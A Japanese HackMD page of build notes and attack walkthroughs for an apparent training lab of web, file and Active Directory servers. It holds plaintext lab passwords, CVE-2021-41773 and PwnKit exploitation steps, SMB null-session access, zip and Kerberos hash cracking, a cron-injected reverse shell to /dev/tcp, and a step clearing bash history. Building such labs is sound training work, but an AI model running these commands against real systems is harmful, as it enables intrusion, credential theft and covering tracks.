サーバ構築 - HackMD

# サーバ構築 ## 参照dns - 172.24.2.51 ## developアカウント - user: develop - pass: !g3tdev310pacc0un7 ## アカウント AS-REP ROAST user: ad_svcpass: Service1Kerberoasting user: Administratorpass: Tickettouts3→変更Team2alice ## ファイルサーバ（岡） ### OS - ubuntu 21.10 -> ubuntu 22.04.1 ### アカウント情報 - file_serv(user権限) - pass: il0v3f1l3serv3r - root - pass: 1hav3r0otpr!v ### 設定ログ ``` sudo useradd -m -d /home/file_serv -U file_serv -s /bin/bash -p $(perl -e 'print crypt("il0v3f1l3serv3r", "\$6\$salt03")') sudo passwd root new pass: 1hav3r0otpr!v apt-get install samba ``` ### 攻略 #### ユーザ権限 - smb null access - `smbclient //<ip>/<sharename>` - get zip file - `get cred.zip` - crack zip file password(attack machine) - `sudo fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u cred.zip` - view cred.txt - `cat cred.txt` - get file_serv pass - ssh access as file_serv - `ssh file_serv@<ip>` - get shell as file_serv #### root権限 - listing cron jobs - `crontab -l` - change update script - `echo "/bin/bash >& /dev/tcp/<ip>/444 0>&1" >> /usr/bin/update_checker.sh` - listening network access on port 444(attack mahcine) - `nc -nlvp 444` or `rlwrap nc -nlvp 444` - get root access #### port forward ## webサーバ ### アカウント情報 - web_serv - pass: w3buserpr!v - root - pass: 4dm!nro0tpr1v ### 設定ログ ``` sudo useradd -m -d /home/web_serv -U web_serv -s /bin/bash -p $(perl -e 'print crypt("w3buserpr!v", "\$6\$salt03")') sudo passwd root new pass: 4dm!nro0tpr1v ``` ### useful software - /usr/bin/base64 - /usr/bin/curl - /usr/bin/g++ - /usr/bin/gcc - /snap/bin/lxc - /usr/bin/make - /usr/bin/nc - /usr/bin/netcat - /usr/bin/perl - /usr/bin/ping - /usr/bin/python3 × - /usr/bin/sudo - /usr/bin/wget ## 攻略 ### Web #### 初期アクセス - web(10.0.2.22)が公開されているので、ブラウザでアクセス - `whatweb 10.0.2.22`コマンドor httpリクエストでApache2.4.49バージョンを確認(kali) - apache 2.4.49 vulnerabilityとgoogle検索すると4番目の検索結果に[このページ](https://www.exploit-db.com/exploits/50383)がでるので確認(自分の端末) - CVE-2021-41773のexploitコードであることを確認し、サイトのEDB-ID（50383）をメモ（自分の端末） - exploitdbのexploitコードなのでkaliのローカルに保存されているので、`searchsploit -p 50383`にてexploitコードを検索（kali） - 出力されたexploitコードのlocal pathから、カレントディレクトリに対してコードをコピーする`cp <コードのpath> .`（kali） - コピーしてきたコードに実行権限を付与`chmod +x <コード名>` - exploit実行`./<コード名>　10.0.2.22 <入手したいファイル名>`（今回は/etc/passwdでweb_servというbashのログインアカウントがあることを確認し、/home/web_serv/.ssh/id_rsaでsshの秘密鍵を入手）（kali） - 入手した秘密鍵をid_rsaという名前でローカルに保存 - `chmod 600 id_rsa`の実行 - `ssh -i id_rsa web_serv@192.168.200.1`でアクセス取得 - #### 権限昇格 - 内部に侵入するため情報収集 - web_servが制限されたアカウントのため、権限昇格を試みる - `cat /etc/issue`コマンドでOSのバージョン確認-> ubuntu21.04 - ubuntu 21.04 privilege escalationでgoogle検索をかけると、1番目にCVE-2021-4034 - Ubuntuというリンクがあるので確認すると、ローカルの権限昇格があると分かる。 - CVE-2021-4034 exploitで検索すると、[このリンク](https://www.exploit-db.com/exploits/50689)があるのでアクセス - searchsploit -p 50689でコードを検索（kali） - 作業ディレクトリにコピー - コードを3つのファイルに別々で保存する - makeコマンドを実行 - exploitコードができる - exploitコードをwebサーバ側に移す - pythonで簡易サーバを立てる`python3 -m http.server 8080`（kali） - webサーバからwgetコマンドでアクセス`wget http://<kali ip>:8080/<exploit code>`（webサーバ） - 保存ディレクトリは/home/web_servや/tmp等の書き込み権限が許可されたディレクトリ - exploitコードに実行権限付与`chmod +x <exploit code>` - コード実行`./<exploit code>` - root権限取得 #### 内部調査 - /etc/hostsファイル内にfileサーバのipがあるので、pingコマンドを実行`ping <file_serv ip>` - 疎通が取れるので内部に侵入可能とわかる - kali端末から直接アクセスをしたいので、ダイナミックポートフォワードを行う - https://github.com/t3l3machus/pentest-pivoting - ### file #### 初期アクセス - proxychainsを使ってポートフォワード先のネットワークにアクセス - nmapにてオープンポートの確認（to file server） - smb（tcp port 445）が開いているのでsmbの列挙を行う - smbclientにてnull sessionの試行 - アクセス成功 - cred.zipとad_user.txtがある - cred.zipはget可能なのでローカルに保存 - unzipにて開こうとするとpasswordを聞かれるので、zipのパスワードクラックを行う - `sudo fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u fcrack.zip` - パスワードがclosedとわかるので、unzipにて解凍 - 中のcred.txtからfileサーバのクレデンシャルがわかるので、sshで接続 #### 権限昇格 - pspyにてプロセスダンプ - update_checker.shがroot権限で定期実行されていることがわかる - change update script - `echo "/bin/bash >& /dev/tcp/<ip>/444 0>&1" >> /usr/bin/update_checker.sh` - listening network access on port 444(attack mahcine) - `nc -nlvp 444` or `rlwrap nc -nlvp 444` - ad_user.txtの取得 ### AD #### 初期アクセス - windows2019の脆弱性AS-REP-Roastingを使ってユーザ権限に昇格 - `impacket-GetNPUsers　KRBS.local/ -usersfile <filename>　-dc-ip=192.168.50.46`でハッシュを取得 - ハッシュをファイル(tgt)に保存 - `sudo john tgt`でハッシュを解析し、ユーザ権限に昇格 #### 権限昇格 - windows2019の脆弱性Kerberoastingを使って管理者権限に昇格 - `impacketGetUserSPNs -dc-ip=192.168.50.46 KRBS.local/ad_svc`で管理者権限のユーザ名を確認 - `impacket-GetNPUsers　KRBS.local/Administrator　-dc-ip=192.168.50.46`でハッシュを取得 - `john <hash file> --wordlist=/usr/share/wordlists/rockyou.txt`でハッシュ解析 - パスワードがTickettouts3とわかるので、wsmanよりアクセス - AS-REP ROAST user: ad_svc pass: Service1 Kerberoasting user: Administrator pass: Tickettouts3 ## 残タスク - port forward検証 - developアカウント消去 - `userdel -r <username>` - iptables, uwf, httpd自動起動 - ADserverへのアクセス制限(fileサーバからのport forward) - その他ホストへの接続検証（想定したホストのみに接続可能となっているか） - コマンド実行履歴削除 - `cat /dev/null > ~/.bash_history ` - webserverの/etc/hostsにfileサーバーのipを記述 -